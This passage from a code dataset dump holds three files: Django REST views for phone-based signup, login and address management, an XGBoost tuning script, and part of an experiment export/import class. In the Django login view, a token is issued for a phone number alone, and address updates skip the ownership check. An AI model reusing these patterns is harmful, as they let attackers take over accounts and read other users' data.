sub = (now-c).total_seconds()\n if sub < 0:\n sub = sub * -1\n if sub <= 120:\n content = {\n 'code': 2,\n 'status': 'no',\n 'detail': '2 mins ago you have a sms'\n }\n return Response(content, status=status.HTTP_200_OK)\n signup_sms_code.delete()\n\n except VerifyCode.DoesNotExist:\n pass\n\n except get_user_model().DoesNotExist:\n try:\n user = get_user_model().objects.create_user(username=phone, phone=phone)\n user.is_active = False\n check_sms_or_call = True\n except:\n return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)\n\n # Set user fields provided\n # if not user.is_active:\n # password = _generate_pass()\n # user.set_password(password)\n\n user.save()\n if must_validate_sms:\n # Create and associate signup code\n x_forwarded_for = request.META.get('HTTP_X_FORWARDED_FOR', '0.0.0.0')\n if x_forwarded_for:\n ipaddr = x_forwarded_for.split(',')[0]\n else:\n ipaddr = request.META.get('REMOTE_ADDR', '0.0.0.0')\n\n signup_sms_code = VerifyCode.objects.create_sms_code(user=user, ipaddr=ipaddr)\n check_status = signup_sms_code.send_signup_sms()\n # TODO : check this status after get code\n if not check_status:\n print(\"check status in sms error phone is : \", user.phone)\n content = {'code': 1,\n 'status': 'no'\n }\n else:\n content = {'code': 0,\n 'status': 'ok'\n }\n return Response(content, status=status.HTTP_201_CREATED)\n\n return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)\n\n############################\n############################\n\n\nclass Verify(APIView):\n permission_classes = (AllowAny,)\n serializer_class = VerifySerializer\n\n def post(self, request, format=None):\n serializer = self.serializer_class(data=request.data)\n if serializer.is_valid():\n verified = False\n code = serializer.validated_data['code']\n phone = serializer.validated_data['phone']\n try:\n user = get_user_model().objects.get(phone=phone)\n except get_user_model().DoesNotExist:\n content = {'code': 1, 'status': 'no', 'detail': 'user does not exist.'}\n return Response(content, status=status.HTTP_400_BAD_REQUEST)\n\n try:\n verified = VerifyCode.objects.set_user_is_verified(code=code, user=user)\n except VerifyCode.DoesNotExist:\n content = {'code': 2, 'status': 'no', 'detail': 'code does not exist.'}\n return Response(content, status=status.HTTP_400_BAD_REQUEST)\n\n if verified:\n content = {'code': 0, 'status': 'ok', 'detail': 'User verified.'}\n return Response(content, status=status.HTTP_200_OK)\n else:\n content = {'code': 3, 'status': 'no', 'detail': 'Unable to verify user.'}\n return Response(content, status=status.HTTP_400_BAD_REQUEST)\n return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)\n\n############################\n############################\n\n\nclass Login(APIView):\n permission_classes = (AllowAny,)\n serializer_class = LoginSerializer\n\n def post(self, request, format=None):\n serializer = self.serializer_class(data=request.data)\n\n if serializer.is_valid():\n phone = serializer.validated_data['phone']\n try:\n user = get_user_model().objects.get(phone=phone)\n if user.is_active:\n token, created = Token.objects.get_or_create(user=user)\n return Response({'code': 0, 'id': user.id, 'token': token.key, 'fname': user.first_name,\n 'lname': user.last_name, 'email': user.email},\n status=status.HTTP_200_OK)\n else:\n content = {'code': 2, 'detail': 'Unable to login with provided credentials.'}\n return Response(content, status=status.HTTP_202_ACCEPTED)\n except get_user_model().DoesNotExist:\n return Response({'code': 3, 'detail': 'user does not exist.'}, status=status.HTTP_202_ACCEPTED)\n\n else:\n return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)\n\n############################\n############################\n\n\nclass UserUpdate(APIView):\n # permission_classes = IsClient\n authentication_classes = (TokenAuthentication,)\n serializer_class = UserUpdateSerializer\n\n def post(self, request, format=None):\n serializer = self.serializer_class(data=request.data)\n\n if serializer.is_valid():\n user = request.user\n if user.is_anonymous:\n content = {'code': 1, 'detail': 'User is anonymous in user update'}\n return Response(content, status=status.HTTP_401_UNAUTHORIZED)\n\n first_name = serializer.validated_data.get('first_name', '')\n last_name = serializer.validated_data.get('last_name', '')\n email = serializer.validated_data.get('email', '')\n temp = 0\n\n if first_name != '':\n user.first_name = first_name\n temp = 1\n\n if last_name != '':\n user.last_name = last_name\n temp = 1\n\n if email != '':\n user.email = email\n temp = 1\n\n if temp == 1:\n user.save()\n\n content = {'code': 0, 'first_name': user.first_name,\n 'last_name': user.last_name, 'email': user.email}\n return Response(content, status=status.HTTP_200_OK,\n headers={'Access-Control-Allow-Origin': '*'})\n\n else:\n content = {'code': 2, 'detail': 'error in user update api'}\n return Response(content, status=status.HTTP_200_OK)\n\n############################\n############################\n\n\nclass AddressApiView(APIView):\n # permission_classes = (IsClient,)\n serializer_class = AddressSerializer\n authentication_classes = (TokenAuthentication,)\n\n def post(self, request, opt):\n serializer = self.serializer_class(data=request.data)\n # print(request.POST['id'])\n if serializer.is_valid():\n try:\n # print(serializer.data)\n user = request.user\n if user.is_anonymous:\n content = {'code': 1, 'detail': 'user is anonymous.'}\n return Response(content, status=status.HTTP_200_OK)\n if opt == 'delete':\n id = serializer.data.get('id', '')\n if id:\n try:\n add = Address.objects.get(id=id, user=user, status=1)\n add.status = 0\n add.save()\n content = {'code': 0, 'detail': 'Address deleted.'}\n return Response(content, status=status.HTTP_202_ACCEPTED)\n except Address.DoesNotExist:\n pass\n content = {'code': 3, 'detail': 'Address Does not exist in deleting address.'}\n return Response(content, status=status.HTTP_200_OK)\n elif opt == 'update':\n try:\n id = serializer.data.get('id', None)\n add = Address.objects.get(id=id)\n lat = serializer.data.get('lat', None)\n lng = serializer.data.get('lng', None)\n if lat is not None and lng is not None:\n lat = float(lat)\n lng = float(lng)\n location = {'type': 'Point', 'coordinates': [lng, lat]}\n else:\n location = add.location\n address = serializer.data.get('address', add.addr)\n phone = serializer.data.get('phone', add.phone)\n name = serializer.data.get('name', add.name)\n zipcode = serializer.data.get('zipcode', add.zip_code)\n add.addr = address\n add.name = name\n add.phone = phone\n add.zip_code = zipcode\n add.location = location\n add.save()\n content = {'id': add.id, 'name': add.name, 'lat': lat, 'lng': lng, 'address': add.addr,\n 'user': user.id, 'phone': add.phone, 'zip_code': add.zip_code}\n return Response(content, status=status.HTTP_202_ACCEPTED,\n headers={'Access-Control-Allow-Origin': '*'})\n except Address.DoesNotExist:\n content = {'code': 3, 'detail': 'address not exist in address update.'}\n return Response(content, status=status.HTTP_200_OK,\n headers={'Access-Control-Allow-Origin': '*'})\n else:\n try:\n lat = serializer.data.get('lat', None)\n lng = serializer.data.get('lng', None)\n if lat is not None and lng is not None:\n lat = float(lat)\n lng = float(lng)\n location = {'type': 'Point', 'coordinates': [lng, lat]}\n else:\n location = None\n address = serializer.data.get('address', '')\n phone = serializer.data.get('phone', None)\n name = serializer.data.get('name', None)\n zipcode = serializer.data.get('zipcode', None)\n add = Address.objects.create(user=user, phone=phone, zip_code=zipcode,\n location=location, addr=address, name=name)\n\n content = {'id': add.id, 'name': add.name, 'lat': lat, 'lng': lng, 'address': add.addr,\n 'user': user.id, 'phone': add.phone, 'zip_code': add.zip_code}\n return Response(content, status=status.HTTP_202_ACCEPTED,\n headers={'Access-Control-Allow-Origin': '*'})\n except:\n content = {'code': 2, 'detail': 'error occurred in address create.'}\n return Response(content, status=status.HTTP_200_OK)\n except:\n content = {'code': 2, 'detail': 'error occurred in address api view.'}\n return Response(content, status=status.HTTP_200_OK)\n\n return Response(serializer.errors, status=status.HTTP_200_OK)\n\n\nclass AddressListAPIView(generics.ListAPIView):\n authentication_classes = (TokenAuthentication,)\n serializer_class = AddressListSerializer\n permission_classes = (IsAuthenticated,)\n\n def get_queryset(self):\n try:\n user = self.request.user\n if user:\n addresses = Address.objects.filter(user=user)\n return addresses\n else:\n content = {'code': 0, 'detail': 'User Does not exist in List address.'}\n return Response(content, status=status.HTTP_200_OK)\n except:\n content = {'code': 1, 'detail': 'error in address list'}\n return Response(content, status=status.HTTP_200_OK)\n\n def list(self, request, *args, **kwargs):\n queryset = self.get_queryset()\n serializer = self.get_serializer(queryset, many=True)\n return Response(serializer.data, status=status.HTTP_200_OK,\n headers={'Access-Control-Allow-Origin': '*'})\n\n############################\n############################\n","repo_name":"Hojjatrt/KishvandMarket","sub_path":"userapp/api/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":14037,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"} +{"seq_id":"18395406772","text":"import pandas as pd\r\nimport numpy as np\r\nimport xgboost as xgb\r\nfrom sklearn.model_selection import GridSearchCV\r\nfrom sklearn.model_selection import train_test_split\r\nfrom sklearn.metrics import accuracy_score\r\n\r\nfrom sklearn.datasets import make_classification\r\n\r\n\r\n# X为样本特征,y为样本类别输出, 共10000个样本,每个样本20个特征,输出有2个类别,没有冗余特征,每个类别一个簇\r\nX, y = make_classification(n_samples=10000, n_features=20, n_redundant=0,\r\n n_clusters_per_class=1, n_classes=2, flip_y=0.1)\r\n\r\nX_train, X_test, y_train, y_test = train_test_split(X, y, random_state=2)\r\n\r\n\r\nsklearn_model = xgb.XGBClassifier(learning_rate= 0.5, verbosity=1, objective='binary:logistic',random_state=1) #!! verbosity打印\r\nsklearn_model=sklearn_model.set_params(early_stopping_rounds=10, eval_metric='error')\r\nsklearn_model.fit(X_train, y_train,eval_set=[(X_test, y_test)])\r\nprint('---'*10)\r\n\r\nsklearn_model_1 = xgb.XGBClassifier(learning_rate= 0.5, verbosity=1, objective='binary:logistic',random_state=1)\r\ngsCv = GridSearchCV(sklearn_model_1,\r\n {'max_depth':[3,4,5],\r\n 'n_estimators':[5,10,20]})\r\ngsCv.fit(X_train,y_train)\r\n\r\nprint(gsCv.best_score_)\r\nprint(gsCv.best_params_)\r\n\r\nsklearn_model_2 = xgb.XGBClassifier(max_depth=4,n_estimators=5,verbosity=1, objective='binary:logistic',random_state=1)\r\ngsCv2 = GridSearchCV(sklearn_model_2, \r\n {'learning_rate': [0.3,0.5,0.7]})\r\ngsCv2.fit(X_train,y_train)\r\n\r\nprint(gsCv2.best_score_)\r\nprint(gsCv2.best_params_)\r\n\r\nsklearn_model_final = xgb.XGBClassifier(max_depth=4,learning_rate= 0.7, verbosity=1, objective='binary:logistic',n_estimators=10)\r\nsklearn_model_final.set_params(early_stopping_rounds=10, eval_metric=\"error\")\r\nsklearn_model_final.fit(X_train, y_train,eval_set=[(X_test, y_test)])\r\n\r\n","repo_name":"demonjack01/machine_learning","sub_path":"机器学习/刘建平/集成学习/XGBboost.py","file_name":"XGBboost.py","file_ext":"py","file_size_in_byte":1858,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"30569916376","text":"import hashlib\nimport importlib\nimport os\nimport re\nfrom collections import defaultdict\nfrom datetime import datetime, timezone\nfrom io import BytesIO\nfrom itertools import chain\nfrom operator import attrgetter\nfrom os.path import splitext\nfrom pathlib import Path\nfrom typing import (\n Optional,\n Any,\n Type,\n Set,\n Dict,\n Sequence,\n Tuple,\n BinaryIO,\n Union,\n Mapping,\n IO,\n Callable,\n)\nfrom urllib.parse import unquote, urlparse\nfrom uuid import uuid4, UUID, uuid5\nfrom zipfile import ZipFile, ZIP_BZIP2\n\nimport mongoengine\nfrom boltons.iterutils import chunked_iter, first\nfrom furl import furl\nfrom mongoengine import Q\n\nfrom apiserver.bll.event import EventBLL\nfrom apiserver.bll.event.event_common import EventType\nfrom apiserver.bll.project import project_ids_with_children\nfrom apiserver.bll.task.artifacts import get_artifact_id\nfrom apiserver.bll.task.param_utils import (\n split_param_name,\n hyperparams_default_section,\n hyperparams_legacy_type,\n)\nfrom apiserver.config_repo import config\nfrom apiserver.config.info import get_default_company\nfrom apiserver.database.model import EntityVisibility, User\nfrom apiserver.database.model.model import Model\nfrom apiserver.database.model.project import Project\nfrom apiserver.database.model.task.task import (\n Task,\n ArtifactModes,\n TaskStatus,\n TaskModelTypes,\n TaskModelNames,\n)\nfrom apiserver.database.utils import get_options\nfrom apiserver.utilities import json\nfrom apiserver.utilities.dicts import nested_get, nested_set, nested_delete\nfrom apiserver.utilities.parameter_key_escaper import ParameterKeyEscaper\n\n\nclass PrePopulate:\n module_name_prefix = \"apiserver.\"\n event_bll = EventBLL()\n events_file_suffix = \"_events\"\n export_tag_prefix = \"Exported:\"\n export_tag = f\"{export_tag_prefix} %Y-%m-%d %H:%M:%S\"\n metadata_filename = \"metadata.json\"\n zip_args = dict(mode=\"w\", compression=ZIP_BZIP2)\n artifacts_ext = \".artifacts\"\n img_source_regex = re.compile(\n r\"['\\\"]source['\\\"]:\\s?['\\\"](https?://(?:localhost:8081|files.*?)/.*?)['\\\"]\",\n flags=re.IGNORECASE,\n )\n _name_guid_ns = UUID(\"bda3acc1-e612-506c-bade-80071b6cf039\")\n _example_id_prefix = \"e-\"\n task_cls: Type[Task]\n project_cls: Type[Project]\n model_cls: Type[Model]\n user_cls: Type[User]\n\n # noinspection PyTypeChecker\n @classmethod\n def _init_entity_types(cls):\n if not hasattr(cls, \"task_cls\"):\n cls.task_cls = cls._get_entity_type(\"database.model.task.task.Task\")\n if not hasattr(cls, \"model_cls\"):\n cls.model_cls = cls._get_entity_type(\"database.model.model.Model\")\n if not hasattr(cls, \"project_cls\"):\n cls.project_cls = cls._get_entity_type(\"database.model.project.Project\")\n if not hasattr(cls, \"user_cls\"):\n cls.user_cls = cls._get_entity_type(\"database.model.User\")\n\n class JsonLinesWriter:\n def __init__(self, file: BinaryIO):\n self.file = file\n self.empty = True\n\n def __enter__(self):\n self._write(\"[\")\n return self\n\n def __exit__(self, exc_type, exc_value, exc_traceback):\n self._write(\"\\n]\")\n\n def _write(self, data: str):\n self.file.write(data.encode(\"utf-8\"))\n\n def write(self, line: str):\n if not self.empty:\n self._write(\",\")\n self._write(\"\\n\" + line)\n self.empty = False\n\n @staticmethod\n def _get_last_update_time(entity) -> datetime:\n return getattr(entity, \"last_update\", None) or getattr(entity, \"created\")\n\n @classmethod\n def _check_for_update(\n cls, map_file: Path, entities: dict, metadata_hash: str\n ) -> Tuple[bool, Sequence[str]]:\n if not map_file.is_file():\n return True, []\n\n files = []\n try:\n map_data = json.loads(map_file.read_text())\n files = map_data.get(\"files\", [])\n for file in files:\n if not Path(file).is_file():\n return True, files\n\n new_times = {\n item.id: cls._get_last_update_time(item).replace(tzinfo=timezone.utc)\n for item in chain.from_iterable(entities.values())\n }\n old_times = map_data.get(\"entities\", {})\n\n if set(new_times.keys()) != set(old_times.keys()):\n return True, files\n\n for id_, new_timestamp in new_times.items():\n if new_timestamp != old_times[id_]:\n return True, files\n\n if metadata_hash != map_data.get(\"metadata_hash\", \"\"):\n return True, files\n\n except Exception as ex:\n print(\"Error reading map file. \" + str(ex))\n return True, files\n\n return False, files\n\n @classmethod\n def _write_update_file(\n cls,\n map_file: Path,\n entities: dict,\n created_files: Sequence[str],\n metadata_hash: str,\n ):\n map_file.write_text(\n json.dumps(\n dict(\n files=created_files,\n entities={\n entity.id: cls._get_last_update_time(entity)\n for entity in chain.from_iterable(entities.values())\n },\n metadata_hash=metadata_hash,\n )\n )\n )\n\n @staticmethod\n def _filter_artifacts(artifacts: Sequence[str]) -> Sequence[str]:\n def is_fileserver_link(a: str) -> bool:\n a = a.lower()\n if a.startswith(\"https://files.\"):\n return True\n if a.startswith(\"http\"):\n parsed = urlparse(a)\n if parsed.scheme in {\"http\", \"https\"} and parsed.netloc.endswith(\n \"8081\"\n ):\n return True\n return False\n\n fileserver_links = [a for a in artifacts if is_fileserver_link(a)]\n print(\n f\"Found {len(fileserver_links)} files on the fileserver from {len(artifacts)} total\"\n )\n\n return fileserver_links\n\n @classmethod\n def export_to_zip(\n cls,\n filename: str,\n experiments: Sequence[str] = None,\n projects: Sequence[str] = None,\n artifacts_path: str = None,\n task_statuses: Sequence[str] = None,\n tag_exported_entities: bool = False,\n metadata: Mapping[str, Any] = None,\n ) -> Sequence[str]:\n cls._init_entity_types()\n\n if task_statuses and not set(task_statuses).issubset(get_options(TaskStatus)):\n raise ValueError(\"Invalid task statuses\")\n\n file = Path(filename)\n entities = cls._resolve_entities(\n experiments=experiments, projects=projects, task_statuses=task_statuses\n )\n\n hash_ = hashlib.md5()\n if metadata:\n meta_str = json.dumps(metadata)\n hash_.update(meta_str.encode())\n metadata_hash = hash_.hexdigest()\n else:\n meta_str, metadata_hash = \"\", \"\"\n\n map_file = file.with_suffix(\".map\")\n updated, old_files = cls._check_for_update(\n map_file, entities=entities, metadata_hash=metadata_hash\n )\n if not updated:\n print(f\"There are no updates from the last export\")\n return old_files\n\n for old in old_files:\n old_path = Path(old)\n if old_path.is_file():\n old_path.unlink()\n\n with ZipFile(file, **cls.zip_args) as zfile:\n if metadata:\n zfile.writestr(cls.metadata_filename, meta_str)\n artifacts = cls._export(\n zfile,\n entities=entities,\n hash_=hash_,\n tag_entities=tag_exported_entities,\n )\n\n file_with_hash = file.with_name(f\"{file.stem}_{hash_.hexdigest()}{file.suffix}\")\n file.replace(file_with_hash)\n created_files = [str(file_with_hash)]\n\n artifacts = cls._filter_artifacts(artifacts)\n if artifacts and artifacts_path and os.path.isdir(artifacts_path):\n artifacts_file = file_with_hash.with_suffix(cls.artifacts_ext)\n with ZipFile(artifacts_file, **cls.zip_args) as zfile:\n cls._export_artifacts(zfile, artifacts, artifacts_path)\n created_files.append(str(artifacts_file))\n\n cls._write_update_file(\n map_file,\n entities=entities,\n created_files=created_files,\n metadata_hash=metadata_hash,\n )\n\n return created_files\n\n @classmethod\n def import_from_zip(\n cls,\n filename: str,\n artifacts_path: str,\n company_id: Optional[str] = None,\n user_id: str = \"\",\n user_name: str = \"\",\n ):\n cls._init_entity_types()\n\n metadata = None\n\n with ZipFile(filename) as zfile:\n try:\n with zfile.open(cls.metadata_filename) as f:\n metadata = json.loads(f.read())\n\n meta_public = metadata.get(\"public\")\n if company_id is None and meta_public is not None:\n company_id = \"\" if meta_public else get_default_company()\n\n if not user_id:\n meta_user_id = metadata.get(\"user_id\", \"\")\n meta_user_name = metadata.get(\"user_name\", \"\")\n user_id, user_name = meta_user_id, meta_user_name\n except Exception:\n pass\n\n if not user_id:\n user_id, user_name = \"__allegroai__\", \"Allegro.ai\"\n\n # Make sure we won't end up with an invalid company ID\n if company_id is None:\n company_id = \"\"\n\n existing_user = cls.user_cls.objects(id=user_id).only(\"id\").first()\n if not existing_user:\n cls.user_cls(id=user_id, name=user_name, company=company_id).save()\n\n cls._import(zfile, company_id, user_id, metadata)\n\n if artifacts_path and os.path.isdir(artifacts_path):\n artifacts_file = Path(filename).with_suffix(cls.artifacts_ext)\n if artifacts_file.is_file():\n print(f\"Unzipping artifacts into {artifacts_path}\")\n with ZipFile(artifacts_file) as zfile:\n zfile.extractall(artifacts_path)\n\n @classmethod\n def upgrade_zip(cls, filename) -> Sequence:\n hash_ = hashlib.md5()\n task_file = cls._get_base_filename(cls.task_cls) + \".json\"\n temp_file = Path(\"temp.zip\")\n file = Path(filename)\n with ZipFile(file) as reader, ZipFile(temp_file, **cls.zip_args) as writer:\n for file_info in reader.filelist:\n if file_info.orig_filename == task_file:\n with reader.open(file_info) as f:\n content = cls._upgrade_tasks(f)\n else:\n content = reader.read(file_info)\n writer.writestr(file_info, content)\n hash_.update(content)\n\n base_file_name, _, old_hash = file.stem.rpartition(\"_\")\n new_hash = hash_.hexdigest()\n if old_hash == new_hash:\n print(f\"The file {filename} was not updated\")\n temp_file.unlink()\n return []\n\n new_file = file.with_name(f\"{base_file_name}_{new_hash}{file.suffix}\")\n temp_file.replace(new_file)\n upadated = [str(new_file)]\n\n artifacts_file = file.with_suffix(cls.artifacts_ext)\n if artifacts_file.is_file():\n new_artifacts = new_file.with_suffix(cls.artifacts_ext)\n artifacts_file.replace(new_artifacts)\n upadated.append(str(new_artifacts))\n\n print(f\"File {str(file)} replaced with {str(new_file)}\")\n file.unlink()\n\n return upadated\n\n @classmethod\n def _upgrade_tasks(cls, f: IO[bytes]) -> bytes:\n \"\"\"\n Build content array that contains upgraded tasks from the passed file\n For each task the old execution.parameters and model.design are\n converted to the new structure.\n The fix is done on Task objects (not the dictionary) so that\n the fields are serialized back in the same order as they were in the original file\n \"\"\"\n with BytesIO() as temp:\n with cls.JsonLinesWriter(temp) as w:\n for line in cls.json_lines(f):\n task_data = cls.task_cls.from_json(line).to_proper_dict()\n cls._upgrade_task_data(task_data)\n new_task = cls.task_cls(**task_data)\n w.write(new_task.to_json())\n return temp.getvalue()\n\n @classmethod\n def update_featured_projects_order(cls):\n order = config.get(\"services.projects.featured.order\", [])\n if not order:\n return\n\n public_default = config.get(\"services.projects.featured.public_default\", 9999)\n\n def get_index(p: Project):\n for index, entry in enumerate(order):\n if (\n entry.get(\"id\", None) == p.id\n or entry.get(\"name\", None) == p.name\n or (\"name_regex\" in entry and re.match(entry[\"name_regex\"], p.name))\n ):\n return index\n return public_default\n\n for project in cls.project_cls.get_many_public(projection=[\"id\", \"name\"]):\n featured_index = get_index(project)\n cls.project_cls.objects(id=project.id).update(featured=featured_index)\n\n @staticmethod\n def _resolve_type(\n cls: Type[mongoengine.Document], ids: Optional[Sequence[str]]\n ) -> Sequence[Any]:\n ids = set(ids)\n items = list(cls.objects(id__in=list(ids)))\n resolved = {i.id for i in items}\n missing = ids - resolved\n for name_candidate in missing:\n results = list(cls.objects(name=name_candidate))\n if not results:\n print(f\"ERROR: no match for `{name_candidate}`\")\n exit(1)\n elif len(results) > 1:\n print(f\"ERROR: more than one match for `{name_candidate}`\")\n exit(1)\n items.append(results[0])\n return items\n\n @classmethod\n def _check_projects_hierarchy(cls, projects: Set[Project]):\n \"\"\"\n For any exported project all its parents up to the root should be present\n \"\"\"\n if not projects:\n return\n\n project_ids = {p.id for p in projects}\n orphans = [p.id for p in projects if p.parent and p.parent not in project_ids]\n if not orphans:\n return\n\n print(\n f\"ERROR: the following projects are exported without their parents: {orphans}\"\n )\n exit(1)\n\n @classmethod\n def _resolve_entities(\n cls,\n experiments: Sequence[str] = None,\n projects: Sequence[str] = None,\n task_statuses: Sequence[str] = None,\n ) -> Dict[Type[mongoengine.Document], Set[mongoengine.Document]]:\n entities = defaultdict(set)\n\n if projects:\n print(\"Reading projects...\")\n projects = project_ids_with_children(projects)\n entities[cls.project_cls].update(\n cls._resolve_type(cls.project_cls, projects)\n )\n print(\"--> Reading project experiments...\")\n query = Q(\n project__in=list(\n set(filter(None, (p.id for p in entities[cls.project_cls])))\n ),\n system_tags__nin=[EntityVisibility.archived.value],\n )\n if task_statuses:\n query &= Q(status__in=list(set(task_statuses)))\n objs = cls.task_cls.objects(query)\n entities[cls.task_cls].update(\n o for o in objs if o.id not in (experiments or [])\n )\n\n if experiments:\n print(\"Reading experiments...\")\n entities[cls.task_cls].update(cls._resolve_type(cls.task_cls, experiments))\n print(\"--> Reading experiments projects...\")\n objs = cls.project_cls.objects(\n id__in=list(\n set(filter(None, (p.project for p in entities[cls.task_cls])))\n )\n )\n project_ids = {p.id for p in entities[cls.project_cls]}\n entities[cls.project_cls].update(o for o in objs if o.id not in project_ids)\n\n cls._check_projects_hierarchy(entities[cls.project_cls])\n\n task_models = chain.from_iterable(\n models\n for task in entities[cls.task_cls]\n if task.models\n for models in (task.models.input, task.models.output)\n if models\n )\n model_ids = {tm.model for tm in task_models}\n if model_ids:\n print(\"Reading models...\")\n entities[cls.model_cls] = set(cls.model_cls.objects(id__in=list(model_ids)))\n\n return entities\n\n @classmethod\n def _filter_out_export_tags(cls, tags: Sequence[str]) -> Sequence[str]:\n if not tags:\n return tags\n return [tag for tag in tags if not tag.startswith(cls.export_tag_prefix)]\n\n @classmethod\n def _cleanup_model(cls, model: Model):\n model.company = \"\"\n model.user = \"\"\n model.tags = cls._filter_out_export_tags(model.tags)\n\n @classmethod\n def _cleanup_task(cls, task: Task):\n task.comment = \"Auto generated by Allegro.ai\"\n task.status_message = \"\"\n task.status_reason = \"\"\n task.user = \"\"\n task.company = \"\"\n task.tags = cls._filter_out_export_tags(task.tags)\n if task.output:\n task.output.destination = None\n\n @classmethod\n def _cleanup_project(cls, project: Project):\n project.user = \"\"\n project.company = \"\"\n project.tags = cls._filter_out_export_tags(project.tags)\n\n @classmethod\n def _cleanup_entity(cls, entity_cls, entity):\n if entity_cls == cls.task_cls:\n cls._cleanup_task(entity)\n elif entity_cls == cls.model_cls:\n cls._cleanup_model(entity)\n elif entity == cls.project_cls:\n cls._cleanup_project(entity)\n\n @classmethod\n def _add_tag(cls, items: Sequence[Union[Project, Task, Model]], tag: str):\n try:\n for item in items:\n item.update(upsert=False, tags=sorted(item.tags + [tag]))\n except AttributeError:\n pass\n\n @classmethod\n def _export_task_events(\n cls, task: Task, base_filename: str, writer: ZipFile, hash_\n ) -> Sequence[str]:\n artifacts = []\n filename = f\"{base_filename}_{task.id}{cls.events_file_suffix}.json\"\n print(f\"Writing task events into {writer.filename}:{filename}\")\n with BytesIO() as f:\n with cls.JsonLinesWriter(f) as w:\n scroll_id = None\n while True:\n res = cls.event_bll.get_task_events(\n company_id=task.company,\n task_id=task.id,\n event_type=EventType.all,\n scroll_id=scroll_id,\n )\n if not res.events:\n break\n scroll_id = res.next_scroll_id\n for event in res.events:\n event_type = event.get(\"type\")\n if event_type == EventType.metrics_image.value:\n url = cls._get_fixed_url(event.get(\"url\"))\n if url:\n event[\"url\"] = url\n artifacts.append(url)\n elif event_type == EventType.metrics_plot.value:\n plot_str: str = event.get(\"plot_str\", \"\")\n for match in cls.img_source_regex.findall(plot_str):\n url = cls._get_fixed_url(match)\n if match != url:\n plot_str = plot_str.replace(match, url)\n artifacts.append(url)\n w.write(json.dumps(event))\n data = f.getvalue()\n hash_.update(data)\n writer.writestr(filename, data)\n\n return artifacts\n\n @staticmethod\n def _get_fixed_url(url: Optional[str]) -> Optional[str]:\n if not (url and url.lower().startswith(\"s3://\")):\n return url\n try:\n fixed = furl(url)\n fixed.scheme = \"https\"\n fixed.host += \".s3.amazonaws.com\"\n return fixed.url\n except Exception as ex:\n print(f\"Failed processing link {url}. \" + str(ex))\n return url\n\n @classmethod\n def _export_entity_related_data(\n cls, entity_cls, entity, base_filename: str, writer: ZipFile, hash_\n ):\n if entity_cls == cls.task_cls:\n return [\n *cls._get_task_output_artifacts(entity),\n *cls._export_task_events(entity, base_filename, writer, hash_),\n ]\n\n if entity_cls == cls.model_cls:\n entity.uri = cls._get_fixed_url(entity.uri)\n return [entity.uri] if entity.uri else []\n\n return []\n\n @classmethod\n def _get_task_output_artifacts(cls, task: Task) -> Sequence[str]:\n if not task.execution.artifacts:\n return []\n\n for a in task.execution.artifacts.values():\n if a.mode == ArtifactModes.output:\n a.uri = cls._get_fixed_url(a.uri)\n\n return [\n a.uri\n for a in task.execution.artifacts.values()\n if a.mode == ArtifactModes.output and a.uri\n ]\n\n @classmethod\n def _export_artifacts(\n cls, writer: ZipFile, artifacts: Sequence[str], artifacts_path: str\n ):\n unique_paths = set(unquote(str(furl(artifact).path)) for artifact in artifacts)\n print(f\"Writing {len(unique_paths)} artifacts into {writer.filename}\")\n for path in unique_paths:\n path = path.lstrip(\"/\")\n full_path = os.path.join(artifacts_path, path)\n if os.path.isfile(full_path):\n writer.write(full_path, path)\n else:\n print(f\"Artifact {full_path} not found\")\n\n @classmethod\n def _get_base_filename(cls, cls_: type):\n name = f\"{cls_.__module__}.{cls_.__name__}\"\n if cls.module_name_prefix and name.startswith(cls.module_name_prefix):\n name = name[len(cls.module_name_prefix) :]\n return name\n\n @classmethod\n def _export(\n cls, writer: ZipFile, entities: dict, hash_, tag_entities: bool = False\n ) -> Sequence[str]:\n \"\"\"\n Export the requested experiments, projects and models and return the list of artifact files\n Always do the export on sorted items since the order of items influence hash\n The projects should be sorted by name so that on import the hierarchy is correctly restored from top to bottom\n \"\"\"\n artifacts = []\n now = datetime.utcnow()\n for cls_ in sorted(entities, key=attrgetter(\"__name__\")):\n items = sorted(entities[cls_], key=attrgetter(\"name\", \"id\"))\n if not items:\n continue\n base_filename = cls._get_base_filename(cls_)\n for item in items:\n artifacts.extend(\n cls._export_entity_related_data(\n cls_, item, base_filename, writer, hash_\n )\n )\n filename = base_filename + \".json\"\n print(f\"Writing {len(items)} items into {writer.filename}:{filename}\")\n with BytesIO() as f:\n with cls.JsonLinesWriter(f) as w:\n for item in items:\n cls._cleanup_entity(cls_, item)\n w.write(item.to_json())\n data = f.getvalue()\n hash_.update(data)\n writer.writestr(filename, data)\n\n if tag_entities:\n cls._add_tag(items, now.strftime(cls.export_tag))\n\n return artifacts\n\n @staticmethod\n def json_lines(file: IO[bytes]):\n for line in file:\n clean = (\n line.decode(\"utf-8\")\n .rstrip(\"\\r\\n\")\n .strip()\n .lstrip(\"[\")\n .rstrip(\",]\")\n .strip()\n )\n if not clean:\n continue\n yield clean\n\n @staticmethod\n def _new_id(_):\n return str(uuid4()).replace(\"-\", \"\")\n\n @classmethod\n def _hash_id(cls, name: str):\n return str(uuid5(cls._name_guid_ns, name)).replace(\"-\", \"\")\n\n @classmethod\n def _example_id(cls, orig_id: str):\n if not orig_id or orig_id.startswith(cls._example_id_prefix):\n return orig_id\n\n return cls._example_id_prefix + orig_id\n\n @classmethod\n def _private_id(cls, orig_id: str):\n if not orig_id or not orig_id.startswith(cls._example_id_prefix):\n return orig_id\n\n return orig_id[len(cls._example_id_prefix) :]\n\n @classmethod\n def _generate_new_ids(\n cls, reader: ZipFile, entity_files: Sequence, metadata: Mapping[str, Any],\n ) -> Mapping[str, str]:\n if not metadata or not any(\n metadata.get(key) for key in (\"new_ids\", \"example_ids\", \"private_ids\")\n ):\n return {}\n\n ids = {}\n for entity_file in entity_files:\n with reader.open(entity_file) as f:\n is_project = splitext(entity_file.orig_filename)[0].endswith(\".Project\")\n if metadata.get(\"new_ids\"):\n id_func = cls._new_id\n elif metadata.get(\"example_ids\"):\n id_func = cls._example_id if not is_project else cls._hash_id\n elif metadata.get(\"private_ids\"):\n id_func = cls._private_id if not is_project else cls._new_id\n for item in cls.json_lines(f):\n doc = json.loads(item)\n orig_id = doc.get(\"_id\")\n if 